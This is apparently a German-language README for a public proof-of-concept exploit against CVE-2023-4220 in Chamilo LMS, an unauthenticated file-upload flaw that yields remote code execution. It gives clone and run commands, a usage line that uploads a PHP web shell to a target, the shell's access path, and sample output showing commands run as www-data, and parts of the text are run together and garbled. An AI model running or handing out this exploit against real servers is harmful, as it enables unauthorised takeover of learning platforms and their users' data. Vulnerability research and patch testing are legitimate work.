
(CVE-2023-4220) Chamilo LMS – Nicht authentifizierte Remote-Code-Ausführung über große Upload-Dateien
Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für die als CVE-2023-4220 identifizierte Sicherheitslücke in Chamilo LMS. Dieser Exploit macht sich eine nicht authentifizierte Datei-Upload-Sicherheitslücke zunutze, die es entfernten Angreifern ermöglicht, beliebigen Code auf dem betroffenen System auszuführen.
Haftungsausschluss: Dieser Code dient ausschließlich zu Bildungs- und Forschungszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch dieses Codes.
Chamilo LMS-Versionen vor diesem Release sind anfällig für dieses Problem. Die Schwachstelle entsteht durch eine unzureichende Validierung und Handhabung von Datei-Uploads, die es Angreifern ermöglicht, schädliche Dateien auf dem Server hochzuladen und auszuführen.
upload_shell() und execute_command(), was es einfacher macht, dem Code zu folgen und ihn zu warten.--shell angeben. Der Standardwert ist rce.php.Dieser Exploit zielt auf die Datei-Upload-Funktionalität in Chamilo LMS ab. Indem ein Angreifer eine schädliche Datei mit PHP-Code erstellt und über einen nicht authentifizierten Endpunkt hochlädt, kann er beliebige Befehle auf dem Server ausführen.
pip install requests.git clone https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit.git
cd Chamilo-CVE-2023-4220-RCE-Exploit
Führen Sie den Exploit aus, indem Sie die Ziel-URL und den auszuführenden Befehl als Argumente übergeben:
python exploit.py <target_url> <command>
python3 exploit.py http://lms.target-site/ id --shell=my_shell.php
Dieser Befehl wird:
id auf dem entfernten Server über die hochgeladene Shell ausführen.Bei Erfolg gibt das Skript Folgendes aus:
Zum Beispiel:
[+] File uploaded successfully!
[+] Access the shell at: http://lms.target-site/main/inc/lib/javascript/bigupload/files/my_shell.php?cmd=
[+] Command Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Dieses Projekt ist unter der MIT-Lizenz lizenziert.
Bei Fragen oder Problemen öffnen Sie bitte ein Issue in diesem Repository oder kontaktieren Sie mich unter [medkamelbouzekria - at - gmail -dot - com].